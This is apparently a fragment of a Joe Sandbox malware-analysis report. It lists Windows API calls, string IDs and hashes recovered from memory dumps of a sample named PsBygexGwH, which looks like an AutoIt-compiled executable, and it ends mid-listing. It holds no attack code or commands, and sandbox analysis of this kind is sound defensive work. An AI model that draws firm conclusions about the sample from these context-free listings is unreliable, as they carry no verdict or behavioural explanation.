                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 2760611726-4108050209
                                                          • Opcode ID: ff3b7037648ef10357ded40dd8fce9edaa1946a1087395bf3b8029f5a9347f93
                                                          • Instruction ID: 58a0cba8b3783673c4424de00a552fb212ecfed3d8382729a13cfa5c94080ebf
                                                          • Opcode Fuzzy Hash: ff3b7037648ef10357ded40dd8fce9edaa1946a1087395bf3b8029f5a9347f93
                                                          • Instruction Fuzzy Hash: 8B128930200A01EFDB25DF24C894BBABBB5FB59314F148569F489DB661CB71EC92CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 001A273E
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001A286A
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001A28A9
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001A28B9
                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 001A2900
                                                          • GetClientRect.USER32(00000000,?), ref: 001A290C
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001A2955
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001A2964
                                                          • GetStockObject.GDI32(00000011), ref: 001A2974
                                                          • SelectObject.GDI32(00000000,00000000), ref: 001A2978
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001A2988
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001A2991
                                                          • DeleteDC.GDI32(00000000), ref: 001A299A
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001A29C6
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 001A29DD
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 001A2A1D
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001A2A31
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 001A2A42
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001A2A77
                                                          • GetStockObject.GDI32(00000011), ref: 001A2A82
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001A2A8D
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001A2A97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: 7ab551c60beff9cbf1b8cb88d98493027a932679e33a635ecf87ced6643cb8dd
                                                          • Instruction ID: 5edbee69bcf63aea96ed376f09cc3a6da2a6e67ec2ad56d537ea89647ffc4485
                                                          • Opcode Fuzzy Hash: 7ab551c60beff9cbf1b8cb88d98493027a932679e33a635ecf87ced6643cb8dd
                                                          • Instruction Fuzzy Hash: 60B14A75A00215BFEB14DFA8DC89EAEBBA9FB59710F004214F915EB690D774AD40CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00194AED
                                                          • GetDriveTypeW.KERNEL32(?,001BCB68,?,\\.\,001BCC08), ref: 00194BCA
                                                          • SetErrorMode.KERNEL32(00000000,001BCB68,?,\\.\,001BCC08), ref: 00194D36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 914bc3db1309bc937ddb1606c9dc5808a40ad2093f28061efb397d606033fec5
                                                          • Instruction ID: 42aaae9a6191e4b0e4d55ce0f82e833a998dd18872464e12f6d9cf00e143bcc4
                                                          • Opcode Fuzzy Hash: 914bc3db1309bc937ddb1606c9dc5808a40ad2093f28061efb397d606033fec5
                                                          • Instruction Fuzzy Hash: 5D61E030605649DFCF08DF69DA82D6DB7B0BF28380BA48055F806AB691DB35ED42DB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 001B7421
                                                          • SetTextColor.GDI32(?,?), ref: 001B7425
                                                          • GetSysColorBrush.USER32(0000000F), ref: 001B743B
                                                          • GetSysColor.USER32(0000000F), ref: 001B7446
                                                          • CreateSolidBrush.GDI32(?), ref: 001B744B
                                                          • GetSysColor.USER32(00000011), ref: 001B7463
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 001B7471
                                                          • SelectObject.GDI32(?,00000000), ref: 001B7482
                                                          • SetBkColor.GDI32(?,00000000), ref: 001B748B
                                                          • SelectObject.GDI32(?,?), ref: 001B7498
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 001B74B7
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001B74CE
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 001B74DB
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001B752A
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001B7554
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 001B7572
                                                          • DrawFocusRect.USER32(?,?), ref: 001B757D
                                                          • GetSysColor.USER32(00000011), ref: 001B758E
                                                          • SetTextColor.GDI32(?,00000000), ref: 001B7596
                                                          • DrawTextW.USER32(?,001B70F5,000000FF,?,00000000), ref: 001B75A8
                                                          • SelectObject.GDI32(?,?), ref: 001B75BF
                                                          • DeleteObject.GDI32(?), ref: 001B75CA
                                                          • SelectObject.GDI32(?,?), ref: 001B75D0
                                                          • DeleteObject.GDI32(?), ref: 001B75D5
                                                          • SetTextColor.GDI32(?,?), ref: 001B75DB
                                                          • SetBkColor.GDI32(?,?), ref: 001B75E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: 711068395a315506f36f3b575e4053e6284d5126b6d53be8583fad284c765be5
                                                          • Instruction ID: 2710bece66ac9bfab409d7c4091621725842047d6d849ac57e49c3521d4aa3d8
                                                          • Opcode Fuzzy Hash: 711068395a315506f36f3b575e4053e6284d5126b6d53be8583fad284c765be5
                                                          • Instruction Fuzzy Hash: 9A614E72904218AFDF119FA8DC49EEE7FB9EB48320F114215F915BB2E1D7749980CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 001B1128
                                                          • GetDesktopWindow.USER32 ref: 001B113D
                                                          • GetWindowRect.USER32(00000000), ref: 001B1144
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001B1199
                                                          • DestroyWindow.USER32(?), ref: 001B11B9
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001B11ED
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001B120B
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001B121D
                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 001B1232
                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 001B1245
                                                          • IsWindowVisible.USER32(00000000), ref: 001B12A1
                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001B12BC
                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001B12D0
                                                          • GetWindowRect.USER32(00000000,?), ref: 001B12E8
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 001B130E
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 001B1328
                                                          • CopyRect.USER32(?,?), ref: 001B133F
                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 001B13AA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: f950bdfd0e60f815b4f717c26da191338639fd1a12f29a337143e271a75d84e0
                                                          • Instruction ID: 04a2d68bdf00be5fa519ca9c783fd7ed85745ef0548c8dcd2c642dc00a224aed
                                                          • Opcode Fuzzy Hash: f950bdfd0e60f815b4f717c26da191338639fd1a12f29a337143e271a75d84e0
                                                          • Instruction Fuzzy Hash: ECB19C71608351AFD714DF68D894FAABBE4FF88350F408918F9999B2A1D731E844CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00138968
                                                          • GetSystemMetrics.USER32(00000007), ref: 00138970
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013899B
                                                          • GetSystemMetrics.USER32(00000008), ref: 001389A3
                                                          • GetSystemMetrics.USER32(00000004), ref: 001389C8
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001389E5
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001389F5
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00138A28
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00138A3C
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00138A5A
                                                          • GetStockObject.GDI32(00000011), ref: 00138A76
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00138A81
                                                            • Part of subcall function 0013912D: GetCursorPos.USER32(?), ref: 00139141
                                                            • Part of subcall function 0013912D: ScreenToClient.USER32(00000000,?), ref: 0013915E
                                                            • Part of subcall function 0013912D: GetAsyncKeyState.USER32(00000001), ref: 00139183
                                                            • Part of subcall function 0013912D: GetAsyncKeyState.USER32(00000002), ref: 0013919D
                                                          • SetTimer.USER32(00000000,00000000,00000028,001390FC), ref: 00138AA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI
                                                          • API String ID: 1458621304-248962490
                                                          • Opcode ID: b5e1d0626ab9599b4caa19baaa3f7b9f58b24daa0263fec71554774420386fa0
                                                          • Instruction ID: 62dc72db3e4ae46ae2b23861837cd1dc4c17be2e045fbe2c03c85993082d3994
                                                          • Opcode Fuzzy Hash: b5e1d0626ab9599b4caa19baaa3f7b9f58b24daa0263fec71554774420386fa0
                                                          • Instruction Fuzzy Hash: A7B16D71A00209EFDB18DFA8CD45BAE7BB5FB48354F114229FA15A7290DB74E880CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 001810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00181114
                                                            • Part of subcall function 001810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181120
                                                            • Part of subcall function 001810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 0018112F
                                                            • Part of subcall function 001810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181136
                                                            • Part of subcall function 001810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0018114D
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00180DF5
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00180E29
                                                          • GetLengthSid.ADVAPI32(?), ref: 00180E40
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00180E7A
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00180E96
                                                          • GetLengthSid.ADVAPI32(?), ref: 00180EAD
                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00180EB5
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00180EBC
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00180EDD
                                                          • CopySid.ADVAPI32(00000000), ref: 00180EE4
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00180F13
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00180F35
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00180F47
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180F6E
                                                          • HeapFree.KERNEL32(00000000), ref: 00180F75
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180F7E
                                                          • HeapFree.KERNEL32(00000000), ref: 00180F85
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180F8E
                                                          • HeapFree.KERNEL32(00000000), ref: 00180F95
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00180FA1
                                                          • HeapFree.KERNEL32(00000000), ref: 00180FA8
                                                            • Part of subcall function 00181193: GetProcessHeap.KERNEL32(00000008,00180BB1,?,00000000,?,00180BB1,?), ref: 001811A1
                                                            • Part of subcall function 00181193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00180BB1,?), ref: 001811A8
                                                            • Part of subcall function 00181193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00180BB1,?), ref: 001811B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                          • String ID:
                                                          • API String ID: 4175595110-0
                                                          • Opcode ID: 417ccc608fa50fd07bca864b13a7ad1b088ea3ea47ade55a4aca586c3e767b2e
                                                          • Instruction ID: 6590e28977be29a37a47dafd313b114c40bf9150146b6cc456ed67aa14b2cad5
                                                          • Opcode Fuzzy Hash: 417ccc608fa50fd07bca864b13a7ad1b088ea3ea47ade55a4aca586c3e767b2e
                                                          • Instruction Fuzzy Hash: 3E71507290020AEBDF61AFA4DC44FAEBBB8BF08350F148215FA55E6151D7719A49CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001AC4BD
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,001BCC08,00000000,?,00000000,?,?), ref: 001AC544
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 001AC5A4
                                                          • _wcslen.LIBCMT ref: 001AC5F4
                                                          • _wcslen.LIBCMT ref: 001AC66F
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 001AC6B2
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 001AC7C1
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 001AC84D
                                                          • RegCloseKey.ADVAPI32(?), ref: 001AC881
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001AC88E
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 001AC960
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 9721498-966354055
                                                          • Opcode ID: 8d84749499460c7ff664a9e310a687789259c357908cbc9ba73ecbfc20ad7c1a
                                                          • Instruction ID: a7a00b570217add46d78fa6db2a2643162406dec2d197afef2ee557289247fdd
                                                          • Opcode Fuzzy Hash: 8d84749499460c7ff664a9e310a687789259c357908cbc9ba73ecbfc20ad7c1a
                                                          • Instruction Fuzzy Hash: 741258396042119FDB14DF24D881A2AB7E5FF89714F15889CF88A9B3A2DB31ED41CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 001B09C6
                                                          • _wcslen.LIBCMT ref: 001B0A01
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001B0A54
                                                          • _wcslen.LIBCMT ref: 001B0A8A
                                                          • _wcslen.LIBCMT ref: 001B0B06
                                                          • _wcslen.LIBCMT ref: 001B0B81
                                                            • Part of subcall function 0013F9F2: _wcslen.LIBCMT ref: 0013F9FD
                                                            • Part of subcall function 00182BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00182BFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 1103490817-4258414348
                                                          • Opcode ID: 811aa53c30dd6738fd5562bed8b03e46a448624c06639b823146b6527b4ce9aa
                                                          • Instruction ID: 8709f2a4753befc3fd2a3e2f5a160eba39ab17771e1fcd66d7f7d3e902de2e59
                                                          • Opcode Fuzzy Hash: 811aa53c30dd6738fd5562bed8b03e46a448624c06639b823146b6527b4ce9aa
                                                          • Instruction Fuzzy Hash: 06E1AA352087018FC715EF24C55096BB7E1BFA8308F15895CF89AAB3A2DB30ED46CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 1256254125-909552448
                                                          • Opcode ID: d84048233860ce776f8bbfa33112f4342f1bb5601caf041db3ec0d18ef6fc756
                                                          • Instruction ID: bf97e85639bc60b6f669fd3be8852b60b0ec01ece5e9c9aa7804a9dcba677516
                                                          • Opcode Fuzzy Hash: d84048233860ce776f8bbfa33112f4342f1bb5601caf041db3ec0d18ef6fc756
                                                          • Instruction Fuzzy Hash: 7671F93AA0056A8BCB10DE7CD9516BF3391AFB67A4F150528F856AB284F731CD85C3E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _wcslen.LIBCMT ref: 001B835A
                                                          • _wcslen.LIBCMT ref: 001B836E
                                                          • _wcslen.LIBCMT ref: 001B8391
                                                          • _wcslen.LIBCMT ref: 001B83B4
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001B83F2
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,001B361A,?), ref: 001B844E
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001B8487
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001B84CA
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001B8501
                                                          • FreeLibrary.KERNEL32(?), ref: 001B850D
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001B851D
                                                          • DestroyIcon.USER32(?), ref: 001B852C
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001B8549
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001B8555
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 799131459-1154884017
                                                          • Opcode ID: 5a76d08b08ce3088e968d35b6673c847f6c849b3b993f1e0c4b8dae2e3ef0035
                                                          • Instruction ID: e07dc53073f0e424b712b77b0c64a767fe57bddcc666b6de0c82159983c2c7a4
                                                          • Opcode Fuzzy Hash: 5a76d08b08ce3088e968d35b6673c847f6c849b3b993f1e0c4b8dae2e3ef0035
                                                          • Instruction Fuzzy Hash: 2161CE71500615BBEB24DF64DC81BFE77ACBB18B21F104609F815E61E1DF74AA90CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
